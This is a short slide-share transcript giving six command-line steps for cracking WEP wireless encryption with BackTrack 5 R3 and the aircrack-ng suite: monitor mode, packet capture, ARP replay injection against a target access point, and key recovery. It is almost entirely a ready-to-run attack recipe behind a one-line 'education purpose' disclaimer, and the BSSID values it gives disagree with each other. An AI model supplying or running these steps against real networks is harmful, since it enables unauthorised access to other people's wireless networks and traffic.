Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)

Post on 30-Apr-2015

7.188 views 3 download

description

Exploit WEP flaws in six steps using back track 5 r3 (crack hack wireless)

Transcript of Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)

Exploit WEP Flaws in six steps using BackTrack 5 R3

DisclaimerI provide this document for education purpose without any responsibility of any illegal use

Prerequisites1. Backtrack 5 r32. Wireless interface compatible with backtrack

a. Check this list http://www.aircrackng.org/doku.php?id=compatibility_drivers

Scope of this document is WEP

1-Start wireless interface in monitoring modeairmon-ng start wlan0

2-list all wireless APs, hosts attached to them, their operating channels and encryption methodsairodump-ng mon0

3-you must set the monitor interface mon0 on the same channel as access pointiwconfig mon0 channel 11

4-airodump-ng --bssid 00:16:01:AE:21:64 --channel 11 --write wepcarack222demo mon0

00:16:01:AE:21:69 is AP address    obtained from step 2 wepcarack222demo output file name  channel obtained from 2

5- From step 4 select connected host or wait for any if none aireplay-ng -3 -b 00:16:01:AE:21:64 -h F0:D1:A9:F0:34:6C mon0

6-aircrack-ng wepcarack222demo-03.cap

Steps 4-5-6 must be on different terminal simultaneously 

Any questions drop an email to mohammedomar@yahoo.com